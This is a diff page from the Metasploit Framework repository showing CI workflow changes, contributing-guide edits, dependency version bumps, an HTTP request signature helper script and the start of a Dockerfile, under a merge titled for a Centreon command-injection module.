automatic module_metadata_base.json update

Merge pull request #20672 from h00die-gr3y/centreon_auth_rce
Centreon authenticated command injection leading to RCE via broker engine "reload" parameter [CVE-2025-5946]
2025-11-05 15:39:36 +00:00 · 2025-11-05 16:29:29 +01:00 · 2025-11-05 09:20:13 +00:00 · 2025-11-04 12:29:56 -06:00 · 2025-11-03 17:30:47 +00:00 · 2025-11-03 14:37:23 +00:00
762 changed files with 18801 additions and 5581 deletions
@@ -44,6 +44,7 @@ on:
      - 'Gemfile.lock'
      - 'data/templates/**'
      - 'modules/payloads/**'
+      - 'lib/msf/base/sessions/**'
      - 'lib/msf/core/payload/**'
      - 'lib/msf/core/**'
      - 'test/modules/**'
@@ -269,12 +269,26 @@ jobs:
        working-directory: metasploit-payloads

      - name: Build Windows payloads via Visual Studio 2022 Build (Windows)
-        shell: cmd
+        shell: pwsh
        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2022' && inputs.build_metasploit_payloads }}
        run: |
-          cd c/meterpreter
-          git submodule init && git submodule update
-          make.bat
+          Set-Location "C:\Program Files (x86)\Microsoft Visual Studio\Installer\"
+          dir
+          $InstallPath = "C:\Program Files\Microsoft Visual Studio\2022\Enterprise"
+          $WorkLoads = '--config "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter\vs-configs\vs2022.vsconfig"'
+          $Arguments = ('/c', "vs_installer.exe", 'modify', '--installPath', "`"$InstallPath`"", $WorkLoads, '--quiet', '--norestart', '--nocache')
+          $process = Start-Process -FilePath cmd.exe -ArgumentList $Arguments -Wait -PassThru -WindowStyle Hidden
+          if ($process.ExitCode -eq 0) {
+            Write-Host "components have been successfully added"
+          } else {
+            Write-Host "components were not installed"
+            exit 1
+          }
+          Set-Location "D:\a\metasploit-payloads\metasploit-payloads\metasploit-payloads\c\meterpreter"
+          $r = Invoke-Command -ScriptBlock { cmd.exe /c 'git submodule init && git submodule update' }
+          Write-Host $r
+          $r = Invoke-Command -ScriptBlock { cmd.exe /c '"C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat' }
+          Write-Host $r
        working-directory: metasploit-payloads

      - name: Build Windows payloads via Visual Studio 2025 Build (Windows)
@@ -37,7 +37,7 @@ when an individual is representing the project or its community.
 Instances of abusive, harassing, or otherwise unacceptable behavior may be
 reported by contacting the project maintainers at msfdev@metasploit.com. If
 the incident involves a committer, you may report it directly to
-caitlin_condon@rapid7.com or todb@metasploit.com.
+smcintyre@metasploit.com or jacquelyn_harris@rapid7.com.

 All complaints will be reviewed and investigated and will result in a
 response that is deemed necessary and appropriate to the circumstances.
@@ -11,7 +11,7 @@ Before we get into the details of contributing code, you should know there are m
 - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed!
 - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality.
 - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!
- - Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.
+ - Add [module documentation]. New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native English speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand.


 ## Code Contributions
@@ -25,8 +25,10 @@ will be closed. We need to ensure the code we're adding to master is written to
 ## Expedited Module Creation Process
 We strive to respect the community that has given us so much, so in the odd situation where we get multiple submissions for the same vulnerability, generally we will work with the first person who assigns themselves to the issue or the first person that submits a good-faith PR.  A good-faith PR might not even work, but it will show that the author is working their way toward a solution.  Despite this general rule, there are rare circumstances where we may ask a contributor to step aside or allow a committer to take the lead on the creation of a new module if a complete and working module with documents has not already been submitted.  This kind of expedited module creation process comes up infrequently, and usually it involves high-profile or high priority modules that we have marked internally as time-critical: think KEV list, active exploitation campaigns, CISA announcements, etc.  In those cases, we may ask a contributor that is assigned to the issue or who has submitted an incomplete module to allow a committer to take over an issue or a module PR in the interest of getting a module out quickly.  If a contributor has submitted an incomplete module, they will remain as a co-author of the module and we may build directly onto the PR they submitted, leaving the original commits in the tree.  We sincerely hope that the original author will remain involved in this expedited module creation process.  We would appreciate testing, critiquing, and any assistance that can be offered.  If the module is complete but requires minor changes, we may ask the contributor to allow us to take over testing/verification and make these minor changes without asking so we can land the module as quickly as possible.  In these cases of minor code changes, the authorship of the module will remain unchanged.  We hope everyone involved in this expedited module creation process continues to feel valued and appreciated.

-### Code Contribution Do's & Don'ts:
+## Vibecoding, AI, and LLM
+My first job had a token ring LAN and I still own a Win98SE CD, so I'm not entirely sure what _vibecoding_ is, but we're cool with any coding technique you use to create a PR as long as it is tested, documented, and does what it says it does.  Untested code is incomplete code, and incomplete code should be marked as a draft PR or WIP (Work in Progress) until it is complete, tested, and ready for a committer to review.  We have had several submissions clearly from AI that were well-formatted, looked really neat, and did nothing it said it did.  While we have no problem with AI-assisted coding, please do not assume that the code generated by an AI or LLM is logically or even syntactically correct.

+### Code Contribution Do's & Don'ts:
 Keeping the following in mind gives your contribution the best chance of landing!

 #### <u>Pull Requests</u>
@@ -42,7 +44,7 @@ Keeping the following in mind gives your contribution the best chance of landing
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
 * **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
-* **Do** test your code.
+* **Do** test your code and submit the test output in your PR with any sensitive information removed.
 * **Do** list [verification steps] so committers can test your code.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.86)
+    metasploit-framework (6.4.97)
      aarch64
      abbrev
      actionpack (~> 7.2.0)
@@ -21,6 +21,7 @@ PATH
      bson
      chunky_png
      csv
+      date (= 3.4.1)
      dnsruby
      drb
      ed25519
@@ -28,7 +29,7 @@ PATH
      em-http-request
      eventmachine
      faker
-      faraday (= 2.7.11)
+      faraday
      faraday-retry
      faye-websocket
      ffi (< 1.17.0)
@@ -45,7 +46,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.221)
+      metasploit-payloads (= 2.0.235)
      metasploit_data_models (>= 6.0.7)
      metasploit_payloads-mettle (= 1.0.45)
      mqtt
@@ -60,7 +61,7 @@ PATH
      network_interface
      nexpose
      nokogiri
-      octokit (~> 4.0)
+      octokit
      openssl-ccm
      openvas-omp
      ostruct
@@ -71,7 +72,7 @@ PATH
      pdf-reader
      pg
      puma
-      rack
+      rack (~> 2.2)
      railties
      rasn1 (= 0.14.0)
      rb-readline
@@ -96,19 +97,20 @@ PATH
      rex-struct2
      rex-text
      rex-zip
+      rexml (= 3.4.1)
      rinda
      ruby-macho
      ruby-mysql
      ruby_smb (~> 3.3.15)
      rubyntlm
      rubyzip
-      sinatra
+      sinatra (~> 3.2)
      sqlite3 (= 1.7.3)
      sshkey
      stringio (= 3.1.1)
      swagger-blocks
      syslog
-      thin
+      thin (~> 1.x)
      tzinfo
      tzinfo-data
      unix-crypt
@@ -127,9 +129,9 @@ GEM
    aarch64 (2.1.0)
      racc (~> 1.6)
    abbrev (0.1.2)
-    actionpack (7.2.2.1)
-      actionview (= 7.2.2.1)
-      activesupport (= 7.2.2.1)
+    actionpack (7.2.2.2)
+      actionview (= 7.2.2.2)
+      activesupport (= 7.2.2.2)
      nokogiri (>= 1.8.5)
      racc
      rack (>= 2.2.4, < 3.2)
@@ -138,19 +140,19 @@ GEM
      rails-dom-testing (~> 2.2)
      rails-html-sanitizer (~> 1.6)
      useragent (~> 0.16)
-    actionview (7.2.2.1)
-      activesupport (= 7.2.2.1)
+    actionview (7.2.2.2)
+      activesupport (= 7.2.2.2)
      builder (~> 3.1)
      erubi (~> 1.11)
      rails-dom-testing (~> 2.2)
      rails-html-sanitizer (~> 1.6)
-    activemodel (7.2.2.1)
-      activesupport (= 7.2.2.1)
-    activerecord (7.2.2.1)
-      activemodel (= 7.2.2.1)
-      activesupport (= 7.2.2.1)
+    activemodel (7.2.2.2)
+      activesupport (= 7.2.2.2)
+    activerecord (7.2.2.2)
+      activemodel (= 7.2.2.2)
+      activesupport (= 7.2.2.2)
      timeout (>= 0.4.0)
-    activesupport (7.2.2.1)
+    activesupport (7.2.2.2)
      base64
      benchmark (>= 0.3)
      bigdecimal
@@ -165,10 +167,10 @@ GEM
    addressable (2.8.7)
      public_suffix (>= 2.0.2, < 7.0)
    afm (0.2.2)
-    allure-rspec (2.26.0)
-      allure-ruby-commons (= 2.26.0)
+    allure-rspec (2.27.0)
+      allure-ruby-commons (= 2.27.0)
      rspec-core (>= 3.8, < 4)
-    allure-ruby-commons (2.26.0)
+    allure-ruby-commons (2.27.0)
      mime-types (>= 3.3, < 4)
      require_all (>= 2, < 4)
      rspec-expectations (~> 3.12)
@@ -204,38 +206,38 @@ GEM
      aws-sigv4 (~> 1.5)
    aws-sigv4 (1.11.0)
      aws-eventstream (~> 1, >= 1.0.2)
-    base64 (0.2.0)
+    base64 (0.3.0)
    bcrypt (3.1.20)
    bcrypt_pbkdf (1.1.1)
    benchmark (0.4.1)
-    bigdecimal (3.2.2)
+    bigdecimal (3.2.3)
    bindata (2.4.15)
    bootsnap (1.18.4)
      msgpack (~> 1.2)
-    bson (5.0.2)
+    bson (5.1.1)
    builder (3.3.0)
-    byebug (11.1.3)
+    byebug (12.0.0)
    chunky_png (1.4.0)
    coderay (1.1.3)
    concurrent-ruby (1.3.5)
-    connection_pool (2.5.3)
+    connection_pool (2.5.4)
    cookiejar (0.3.4)
    crass (1.0.6)
    csv (3.3.2)
    daemons (1.4.1)
    date (3.4.1)
-    debug (1.10.0)
+    debug (1.11.0)
      irb (~> 1.10)
      reline (>= 0.3.8)
    diff-lcs (1.6.2)
-    dnsruby (1.72.4)
-      base64 (~> 0.2.0)
-      logger (~> 1.6.5)
+    dnsruby (1.73.0)
+      base64 (>= 0.2)
+      logger (~> 1.6)
      simpleidn (~> 0.2.1)
    docile (1.4.1)
    domain_name (0.6.20240107)
    drb (2.2.3)
-    ed25519 (1.3.0)
+    ed25519 (1.4.0)
    elftools (1.3.1)
      bindata (~> 2)
    em-http-request (1.1.7)
@@ -247,12 +249,12 @@ GEM
    em-socksify (0.3.3)
      base64
      eventmachine (>= 1.0.0.beta.4)
-    erb (5.0.2)
+    erb (5.0.3)
    erubi (1.13.1)
    eventmachine (1.2.7)
-    factory_bot (6.5.4)
+    factory_bot (6.5.5)
      activesupport (>= 6.1.0)
-    factory_bot_rails (6.5.0)
+    factory_bot_rails (6.5.1)
      factory_bot (~> 6.5)
      railties (>= 6.1.0)
    faker (3.5.1)
@@ -299,7 +301,7 @@ GEM
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.10.2)
+    json (2.15.1)
    language_server-protocol (3.17.0.5)
    license_finder (5.11.1)
      bundler
@@ -310,7 +312,7 @@ GEM
      xml-simple
    lint_roller (1.1.0)
    little-plugger (1.1.4)
-    logger (1.6.6)
+    logger (1.7.0)
    logging (2.4.0)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
@@ -327,7 +329,7 @@ GEM
      mutex_m
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.16)
+    metasploit-credential (6.0.19)
      bigdecimal
      csv
      drb
@@ -340,7 +342,7 @@ GEM
      railties
      rex-socket
      rubyntlm
-      rubyzip
+      rubyzip (< 3.0.0)
    metasploit-model (5.0.4)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
@@ -348,7 +350,7 @@ GEM
      drb
      mutex_m
      railties (~> 7.0)
-    metasploit-payloads (2.0.221)
+    metasploit-payloads (2.0.235)
    metasploit_data_models (6.0.9)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
@@ -361,10 +363,10 @@ GEM
      webrick
    metasploit_payloads-mettle (1.0.45)
    method_source (1.1.0)
-    mime-types (3.6.0)
+    mime-types (3.7.0)
      logger
-      mime-types-data (~> 3.2015)
-    mime-types-data (3.2025.0304)
+      mime-types-data (~> 3.2025, >= 3.2025.0507)
+    mime-types-data (3.2025.0924)
    mini_portile2 (2.8.9)
    minitest (5.25.5)
    mqtt (0.6.0)
@@ -388,12 +390,12 @@ GEM
    network_interface (0.0.4)
    nexpose (7.3.0)
    nio4r (2.7.4)
-    nokogiri (1.18.9)
+    nokogiri (1.18.10)
      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
    nori (2.7.1)
      bigdecimal
-    octokit (4.25.1)
+    octokit (10.0.0)
      faraday (>= 1, < 3)
      sawyer (~> 0.9)
    openssl-ccm (1.2.3)
@@ -403,7 +405,7 @@ GEM
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
    parallel (1.27.0)
-    parser (3.3.8.0)
+    parser (3.3.9.0)
      ast (~> 2.4.1)
      racc
    parslet (1.8.2)
@@ -416,24 +418,24 @@ GEM
      ruby-rc4
      ttfunk
    pg (1.5.9)
-    pp (0.6.2)
+    pp (0.6.3)
      prettyprint
    prettyprint (0.2.0)
-    prism (1.4.0)
-    pry (0.14.2)
+    prism (1.5.1)
+    pry (0.15.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
-    pry-byebug (3.10.1)
-      byebug (~> 11.0)
-      pry (>= 0.13, < 0.15)
+    pry-byebug (3.11.0)
+      byebug (~> 12.0)
+      pry (>= 0.13, < 0.16)
    psych (5.2.6)
      date
      stringio
-    public_suffix (6.0.1)
+    public_suffix (6.0.2)
    puma (6.6.0)
      nio4r (~> 2.0)
    racc (1.8.1)
-    rack (2.2.17)
+    rack (2.2.19)
    rack-protection (3.2.0)
      base64 (>= 0.1.0)
      rack (~> 2.2, >= 2.2.4)
@@ -451,9 +453,9 @@ GEM
    rails-html-sanitizer (1.6.2)
      loofah (~> 2.21)
      nokogiri (>= 1.15.7, != 1.16.7, != 1.16.6, != 1.16.5, != 1.16.4, != 1.16.3, != 1.16.2, != 1.16.1, != 1.16.0.rc1, != 1.16.0)
-    railties (7.2.2.1)
-      actionpack (= 7.2.2.1)
-      activesupport (= 7.2.2.1)
+    railties (7.2.2.2)
+      actionpack (= 7.2.2.2)
+      activesupport (= 7.2.2.2)
      irb (~> 1.13)
      rackup (>= 1.0.0)
      rake (>= 12.2)
@@ -464,13 +466,14 @@ GEM
    rasn1 (0.14.0)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    rdoc (6.14.2)
+    rdoc (6.15.0)
      erb
      psych (>= 4.0.0)
+      tsort
    recog (3.1.14)
      nokogiri
    redcarpet (3.6.1)
-    regexp_parser (2.10.0)
+    regexp_parser (2.11.3)
    reline (0.6.2)
      io-console (~> 0.5)
    require_all (3.0.0)
@@ -487,9 +490,11 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.41)
+    rex-exploitation (0.1.44)
+      bigdecimal
      jsobfu
      metasm
+      racc
      rex-arch
      rex-encoder
      rex-text
@@ -506,7 +511,7 @@ GEM
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.20)
+    rex-random_identifier (0.1.21)
      bigdecimal
      rex-text
    rex-registry (0.1.6)
@@ -532,7 +537,7 @@ GEM
      forwardable
      ipaddr
    rkelly-remix (0.0.7)
-    rspec (3.13.0)
+    rspec (3.13.1)
      rspec-core (~> 3.13.0)
      rspec-expectations (~> 3.13.0)
      rspec-mocks (~> 3.13.0)
@@ -544,7 +549,7 @@ GEM
    rspec-mocks (3.13.5)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-rails (8.0.1)
+    rspec-rails (8.0.2)
      actionpack (>= 7.2)
      activesupport (>= 7.2)
      railties (>= 7.2)
@@ -554,7 +559,7 @@ GEM
      rspec-support (~> 3.13)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.13.4)
+    rspec-support (3.13.6)
    rubocop (1.75.7)
      json (~> 2.3)
      language_server-protocol (~> 3.17.0.2)
@@ -566,7 +571,7 @@ GEM
      rubocop-ast (>= 1.44.0, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 4.0)
-    rubocop-ast (1.44.1)
+    rubocop-ast (1.47.1)
      parser (>= 3.3.7.2)
      prism (~> 1.4)
    ruby-macho (4.1.0)
@@ -618,15 +623,16 @@ GEM
    timeout (0.4.3)
    toml (0.2.0)
      parslet (~> 1.8.0)
+    tsort (0.2.0)
    ttfunk (1.8.0)
      bigdecimal (~> 3.1)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
    tzinfo-data (1.2025.1)
      tzinfo (>= 1.0.0)
-    unicode-display_width (3.1.4)
-      unicode-emoji (~> 4.0, >= 4.0.4)
-    unicode-emoji (4.0.4)
+    unicode-display_width (3.2.0)
+      unicode-emoji (~> 4.1)
+    unicode-emoji (4.1.0)
    unix-crypt (1.3.1)
    useragent (0.16.11)
    warden (1.2.9)
@@ -2,15 +2,15 @@ This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 2.0.1, MIT
 aarch64, 2.1.0, "Apache 2.0"
 abbrev, 0.1.2, "ruby, Simplified BSD"
-actionpack, 7.2.2.1, MIT
-actionview, 7.2.2.1, MIT
-activemodel, 7.2.2.1, MIT
-activerecord, 7.2.2.1, MIT
-activesupport, 7.2.2.1, MIT
+actionpack, 7.2.2.2, MIT
+actionview, 7.2.2.2, MIT
+activemodel, 7.2.2.2, MIT
+activerecord, 7.2.2.2, MIT
+activesupport, 7.2.2.2, MIT
 addressable, 2.8.7, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.26.0, "Apache 2.0"
-allure-ruby-commons, 2.26.0, "Apache 2.0"
+allure-rspec, 2.27.0, "Apache 2.0"
+allure-ruby-commons, 2.27.0, "Apache 2.0"
 arel-helpers, 2.16.0, MIT
 ast, 2.4.3, MIT
 aws-eventstream, 1.3.2, "Apache 2.0"
@@ -23,41 +23,41 @@ aws-sdk-kms, 1.99.0, "Apache 2.0"
 aws-sdk-s3, 1.182.0, "Apache 2.0"
 aws-sdk-ssm, 1.191.0, "Apache 2.0"
 aws-sigv4, 1.11.0, "Apache 2.0"
-base64, 0.2.0, "ruby, Simplified BSD"
+base64, 0.3.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
 bcrypt_pbkdf, 1.1.1, MIT
 benchmark, 0.4.1, "ruby, Simplified BSD"
-bigdecimal, 3.2.2, "ruby, Simplified BSD"
+bigdecimal, 3.2.3, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
 bootsnap, 1.18.4, MIT
-bson, 5.0.2, "Apache 2.0"
+bson, 5.1.1, "Apache 2.0"
 builder, 3.3.0, MIT
 bundler, 2.5.22, MIT
-byebug, 11.1.3, "Simplified BSD"
+byebug, 12.0.0, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
 concurrent-ruby, 1.3.5, MIT
-connection_pool, 2.5.3, MIT
+connection_pool, 2.5.4, MIT
 cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
 csv, 3.3.2, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
 date, 3.4.1, "ruby, Simplified BSD"
-debug, 1.10.0, "ruby, Simplified BSD"
+debug, 1.11.0, "ruby, Simplified BSD"
 diff-lcs, 1.6.2, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
-dnsruby, 1.72.4, "Apache 2.0"
+dnsruby, 1.73.0, "Apache 2.0"
 docile, 1.4.1, MIT
 domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 drb, 2.2.3, "ruby, Simplified BSD"
-ed25519, 1.3.0, MIT
+ed25519, 1.4.0, MIT
 elftools, 1.3.1, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.3, MIT
-erb, 5.0.2, "ruby, Simplified BSD"
+erb, 5.0.3, "ruby, Simplified BSD"
 erubi, 1.13.1, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.5.4, MIT
-factory_bot_rails, 6.5.0, MIT
+factory_bot, 6.5.5, MIT
+factory_bot_rails, 6.5.1, MIT
 faker, 3.5.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
@@ -83,27 +83,27 @@ ipaddr, 1.2.7, "ruby, Simplified BSD"
 irb, 1.15.2, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.10.2, ruby
+json, 2.15.1, ruby
 language_server-protocol, 3.17.0.5, MIT
 license_finder, 5.11.1, MIT
 lint_roller, 1.1.0, MIT
 little-plugger, 1.1.4, MIT
-logger, 1.6.6, "ruby, Simplified BSD"
+logger, 1.7.0, "ruby, Simplified BSD"
 logging, 2.4.0, MIT
 loofah, 2.24.1, MIT
 lru_redux, 1.1.0, MIT
 memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.5, "New BSD"
-metasploit-credential, 6.0.16, "New BSD"
-metasploit-framework, 6.4.86, "New BSD"
+metasploit-credential, 6.0.19, "New BSD"
+metasploit-framework, 6.4.97, "New BSD"
 metasploit-model, 5.0.4, "New BSD"
-metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.235, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.9, "New BSD"
 metasploit_payloads-mettle, 1.0.45, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
-mime-types, 3.6.0, MIT
-mime-types-data, 3.2025.0304, MIT
+mime-types, 3.7.0, MIT
+mime-types-data, 3.2025.0924, MIT
 mini_portile2, 2.8.9, MIT
 minitest, 5.25.5, MIT
 mqtt, 0.6.0, MIT
@@ -121,59 +121,59 @@ net-ssh, 7.3.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.7.4, "MIT, Simplified BSD"
-nokogiri, 1.18.9, MIT
+nokogiri, 1.18.10, MIT
 nori, 2.7.1, MIT
-octokit, 4.25.1, MIT
+octokit, 10.0.0, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 ostruct, 0.6.1, "ruby, Simplified BSD"
 packetfu, 2.0.0, "New BSD"
 parallel, 1.27.0, MIT
-parser, 3.3.8.0, MIT
+parser, 3.3.9.0, MIT
 parslet, 1.8.2, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.3, LGPL-2.1
 pdf-reader, 2.14.1, MIT
 pg, 1.5.9, "Simplified BSD"
-pp, 0.6.2, "ruby, Simplified BSD"
+pp, 0.6.3, "ruby, Simplified BSD"
 prettyprint, 0.2.0, "ruby, Simplified BSD"
-prism, 1.4.0, MIT
-pry, 0.14.2, MIT
-pry-byebug, 3.10.1, MIT
+prism, 1.5.1, MIT
+pry, 0.15.2, MIT
+pry-byebug, 3.11.0, MIT
 psych, 5.2.6, MIT
-public_suffix, 6.0.1, MIT
+public_suffix, 6.0.2, MIT
 puma, 6.6.0, "New BSD"
 racc, 1.8.1, "ruby, Simplified BSD"
-rack, 2.2.17, MIT
+rack, 2.2.19, MIT
 rack-protection, 3.2.0, MIT
 rack-session, 1.0.2, MIT
 rack-test, 2.2.0, MIT
 rackup, 1.0.1, MIT
 rails-dom-testing, 2.3.0, MIT
 rails-html-sanitizer, 1.6.2, MIT
-railties, 7.2.2.1, MIT
+railties, 7.2.2.2, MIT
 rainbow, 3.1.1, MIT
 rake, 13.3.0, MIT
 rasn1, 0.14.0, MIT
 rb-readline, 0.5.5, BSD
-rdoc, 6.14.2, ruby
+rdoc, 6.15.0, ruby
 recog, 3.1.14, unknown
 redcarpet, 3.6.1, MIT
-regexp_parser, 2.10.0, MIT
+regexp_parser, 2.11.3, MIT
 reline, 0.6.2, ruby
 require_all, 3.0.0, MIT
 rex-arch, 0.1.18, "New BSD"
 rex-bin_tools, 0.1.10, "New BSD"
 rex-core, 0.1.34, "New BSD"
 rex-encoder, 0.1.8, "New BSD"
-rex-exploitation, 0.1.41, "New BSD"
+rex-exploitation, 0.1.44, "New BSD"
 rex-java, 0.1.8, "New BSD"
 rex-mime, 0.1.11, "New BSD"
 rex-nop, 0.1.4, "New BSD"
 rex-ole, 0.1.9, "New BSD"
 rex-powershell, 0.1.103, "New BSD"
-rex-random_identifier, 0.1.20, "New BSD"
+rex-random_identifier, 0.1.21, "New BSD"
 rex-registry, 0.1.6, "New BSD"
 rex-rop_builder, 0.1.6, "New BSD"
 rex-socket, 0.1.62, "New BSD"
@@ -184,15 +184,15 @@ rex-zip, 0.1.6, "New BSD"
 rexml, 3.4.1, "Simplified BSD"
 rinda, 0.2.0, "ruby, Simplified BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.13.0, MIT
+rspec, 3.13.1, MIT
 rspec-core, 3.13.5, MIT
 rspec-expectations, 3.13.5, MIT
 rspec-mocks, 3.13.5, MIT
-rspec-rails, 8.0.1, MIT
+rspec-rails, 8.0.2, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.13.4, MIT
+rspec-support, 3.13.6, MIT
 rubocop, 1.75.7, MIT
-rubocop-ast, 1.44.1, MIT
+rubocop-ast, 1.47.1, MIT
 ruby-macho, 4.1.0, MIT
 ruby-mysql, 4.2.0, MIT
 ruby-prof, 1.7.2, "Simplified BSD"
@@ -221,11 +221,12 @@ tilt, 2.6.0, MIT
 timecop, 0.9.10, MIT
 timeout, 0.4.3, "ruby, Simplified BSD"
 toml, 0.2.0, MIT
+tsort, 0.2.0, "ruby, Simplified BSD"
 ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2025.1, MIT
-unicode-display_width, 3.1.4, MIT
-unicode-emoji, 4.0.4, MIT
+unicode-display_width, 3.2.0, MIT
+unicode-emoji, 4.1.0, MIT
 unix-crypt, 1.3.1, 0BSD
 useragent, 0.16.11, MIT
 warden, 1.2.9, MIT
@@ -7,7 +7,7 @@ require File.expand_path('../boot', __FILE__)
 require 'action_view'
 # Monkey patch https://github.com/rails/rails/blob/v7.2.2.1/actionview/lib/action_view/helpers/tag_helper.rb#L51
 # Might be fixed by 8.x https://github.com/rails/rails/blob/v8.0.2/actionview/lib/action_view/helpers/tag_helper.rb#L51C1-L52C1
-raise unless ActionView::VERSION::STRING == '7.2.2.1' # A developer will need to ensure this is still required when bumping rails
+raise unless ActionView::VERSION::STRING == '7.2.2.2' # A developer will need to ensure this is still required when bumping rails
 module ActionView::Helpers::TagHelper
  class TagBuilder
    def self.define_element(name, code_generator:, method_name: name.to_s.underscore)
@@ -0,0 +1,88 @@
+import hashlib
+import re
+import argparse
+import sys
+from urllib.parse import urlsplit, parse_qs, unquote, quote
+from typing import Dict, List, Tuple
+
+_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]":, -]')
+
+def compute_signature(method: str, path: str, body: str = '', key: str = '') -> str:
+    if not method or not path:
+        raise ValueError("Method and path must be provided.")
+
+    url_parts = urlsplit(path)
+    base_path = url_parts.path
+    
+    if not base_path.startswith('/'):
+        base_path = '/' + base_path
+    
+    raw_query_params: Dict[str, List[str]] = parse_qs(
+        url_parts.query, keep_blank_values=True, strict_parsing=False
+    )
+    
+    canonical_query: List[Tuple[str, str]] = []
+    for k, v_list in raw_query_params.items():
+        if k == '_signature':
+            continue
+            
+        value = unquote(v_list[0]) if v_list else ''
+        canonical_query.append((k, value))
+    
+    canonical_query.sort(key=lambda item: item[0])
+    
+    query_string = '&'.join(f"{k}={quote(v)}" for k, v in canonical_query)
+
+    if query_string:
+        canonical_path = f"{base_path}?{query_string}"
+    else:
+        canonical_path = base_path
+        
+    canonical_path = re.sub(_SIGNATURE_REGEX, '-', canonical_path)
+
+    body_for_signing = re.sub(_SIGNATURE_REGEX, '-', body)
+    
+    if not key:
+        password_hash = "da39a3ee5e6b4b0d3255bfef95601890afd80709"
+    else:
+        password_hash = hashlib.sha1(key.encode('utf-8')).hexdigest().lower()
+
+    data = f"{method.upper()}:{canonical_path}:{body_for_signing}:{password_hash}"
+    
+    return hashlib.sha1(data.encode('utf-8')).hexdigest().lower()
+
+def main():
+    parser = argparse.ArgumentParser(description="Computes a SHA1 signature for an HTTP request.")
+
+    parser.add_argument('--method', type=str, required=True,
+                        choices=['GET', 'POST', 'PUT', 'DELETE'],
+                        help="The HTTP method (e.g., GET).")
+    parser.add_argument('--path', type=str, required=True,
+                        help="The canonical path (e.g., /api/resource?param=value).")
+    parser.add_argument('--key', type=str, default='',
+                        help="The secret key. Defaults to an empty string.")
+    parser.add_argument('--body', type=str, default='',
+                        help="The request body as a string. Defaults to an empty string.")
+
+    try:
+        args = parser.parse_args()
+        
+        signature = compute_signature(
+            method=args.method,
+            path=args.path,
+            body=args.body,
+            key=args.key
+        )
+
+        print(f"Computed Signature: {signature}")
+
+    except ValueError as e:
+        sys.stderr.write(f"Error: {e}\n")
+        sys.exit(1)
+    except Exception as e:
+        sys.stderr.write(f"An unexpected error occurred: {e}\n")
+        sys.exit(1)
+
+
+if __name__ == '__main__':
+    main()
@@ -0,0 +1,25 @@
+FROM php:8.3-fpm
+
+RUN apt-get clean && apt-get update && \
+    apt-get install -y \
+        wget unzip \
+        libicu-dev \
+        libfreetype6-dev \
+        libjpeg62-turbo-dev \
